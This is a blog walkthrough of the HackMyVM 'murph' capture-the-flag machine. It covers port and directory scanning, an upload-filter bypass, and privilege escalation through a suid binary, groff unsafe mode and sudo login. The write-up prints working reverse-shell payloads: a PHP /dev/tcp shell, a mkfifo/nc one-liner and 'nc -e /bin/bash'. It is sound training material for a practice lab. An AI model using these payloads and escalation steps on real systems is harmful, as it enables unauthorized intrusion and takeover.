Skip to content

hackmyvm murph

The free CTF Challenge web site “” have another medium level vm called ‘murph‘ for us to download, enumerate and get some flags. In this write-up will try to describe my method and thought process on how I completed the hackmyvm murph CTF challenge.

This well put together room by the site master “sML” and has some obscure commands to confuse and bemuse. I was off to a bad start but soon I was set on the righteous path thanks the friendly Discord group over on

Table off contents


The murph vm can be downloaded from as an OVA file and imported into Oracle VirtualBox.

My Network,

  • – This is my BlackArch enumeration system.
  • – This is the Murph vm.

For enumeration of the hackmyvm murph Challenge I will be using my BackArch system build that I created in a previous blog post. You can use any Kali, BlackArch, Parrot or just standard Linux to proceed.


Using “nmap” shows that there are a few ports open. SSH and HTTP:

nmap -F

When I see port 80 open, I will always do a gobuster enumeration to fuzz out any web directories that may be important.

gobuster dir -w /opt/directory-list-2.3-medium.txt -u

This quickly shows that there is an dir called “/uploads” on the server. So lets fire up Firefox and open it up.


Looking at the source code I can see something interesting.


So anytime the word “php” is used it will be swapped out to “wtf”. This can be gotten around by realizing (which I didn’t) that php is not case sensitive and that there are alternative to .php extensions.

  • Filename: shell.phtml
  • Content: <?PHP exec(“/bin/bash -c ‘bash -i >&/dev/tcp/ 0>&1′”);?>

Be sure to change the ip to suit your own. Then start up a “nc” listener on your enumeration machine. Also be aware that sometimes browsers change the quotes a bit so if you are copying and pasting the above command make sure the quotes are correct.

nc -vlnp 1234

Web Shell

So back to the web browser, after you click the “Submit Query” button you can just go to the link,

And in your “nc” window you should spawn a shell. It’s important to that you stablize it as some of the following commands won’t work. To stabilize run the following commands. \

python3 -c "import pty;pty.spawn('/bin/bash')"\
export TERM=xterm
Ctrl z
stty raw -echo;fg

If you want to learn more about stabilizing a reverse shell take a look at my post on it.

A stable shell!

More Enumeration

So now its time for some more enumeration, eventually you will find the file “/opt/murph” which is a suid binary and is interesting.


Signal Kill

It’s waiting for a signal called “SIGUSR1”. Digging into the signal man page I found the following entry.


So you have to send the process the signal “SIGUSR1” . You can send signals to processes via the kill command. As already mentioned this has to be done from a stabilized shell, otherwise it won’t work.

kill -10 <pid of the murph process>

Signal 10, kill doesn’t always kill

You should now be the user “jen” and can read the user flag.

What the Groff

The user “jen” has some sudo privileges.


The solution for this is also in the man page for groff!


So why are these unsafe? Well groff is a tool for creating man pages and it allows you to do it inside an interactive(ish) shell.

CommandWhat is it?
.psoRead the standard output from the specified command 
.openOpen the specified file for writing
.openaThe opena request is like open, but if the file exists, append to it instead of truncating it.
.syExecute the shell command(s) specified by cmds.
.piPipe the output of gtroff to the shell command(s) specified by pipe
Which of these looks interesting it’s not what you think!

So fire up groff in unsafe node and use it to connect via revshell to another “nc” listener.

On your enumeration system run a “nc” listener on a different port than the previous one.

nc -vlnp 1235

And on the host run “groff” in “unsafe” mode.

sudo -u pat groff -U

This will launch a kind of shell for groff.

While in the shell you can type commands. So input this one.

.pso rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 1235 >/tmp/f

seems the above command is causing some issues and an alternate command below also works.

.pso nc -e /bin/bash 1235
Remote Shell

Now you should be the user “pat”. It’s worth also stabilizing this shell, see the webshell section for details on how to do it.

You can find some useful groff info here.

And Root Login

As the user “pat” you have access to the login command as root via “sudo”.


This was is just a matter of running the below command.

sudo login -f root

Now you have root access and you can get the root key and submit it to the site over on


I hoped you enjoyed this room as much as I did. I find that I got stuck on something really simple and needed help to get past it, so don’t worry about reading write ups. We all have to do it to progress. While the more complicated stuff seemed to come easier for this room. Usually, for me, its the other way around.

Any comments suggestions please leave them below.

Published inCTFGetting Started With CTF


  1. 147 147

    May I ask the

    What is the meaning of sudo login -f root?

    I checked sudo-h

    This parameter was not found

    • Hi,
      sudo is running the “login” command and the -f option is for the login command.
      See the man page for login
      man login

      Do not perform authentication, user is preauthenticated.

Comments are closed, but trackbacks and pingbacks are open.